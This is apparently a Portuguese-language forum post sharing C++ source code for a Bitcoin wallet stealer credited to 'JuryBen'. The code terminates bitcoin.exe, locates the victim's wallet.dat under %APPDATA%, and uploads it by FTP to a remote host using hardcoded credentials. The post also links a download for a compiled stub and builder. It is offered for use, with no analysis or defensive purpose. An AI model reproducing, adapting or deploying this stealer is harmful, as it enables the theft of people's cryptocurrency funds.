Tweet
Bitcoin Wallet Stealer + Source FTP Server
Vou deixar bem claro que ainda não usei, então não sei se realmente é bom.
O Source não é meu, Coded by JuryBen
Segui o Source:
Código:
// Coded by JuryBen
// Gimme coins
//Uploaded by AnonymousX
//Compiled EXE version stub + maker found here http://adf.ly/2xv3e
#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")
void killprocess()
{
HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
// Get the process list snapshot.
PROCESSENTRY32 ProcessEntry = { 0 };
// Initialize the process entry structure.
ProcessEntry.dwSize = sizeof( ProcessEntry );
// Get the first process info
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );
int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
//Open Process to terminate
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }
}
while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot );
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
killprocess();
Sleep(40000);
srand((unsigned)time(NULL)); // we get time to use for random seed
int seedone=rand(); // seed one
int seedtwo=rand()*3; // seed two times 3
int seedboth = seedone + seedtwo; // combine seeds to ensure random int
// now we need to convert int to char
char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
// did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
char* appdata = getenv("APPDATA"); //Gets %Appdata% path
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); //Bitcoin file to steal
//ftp connection
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);
return 0;
}
Código:
//ftp connection
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
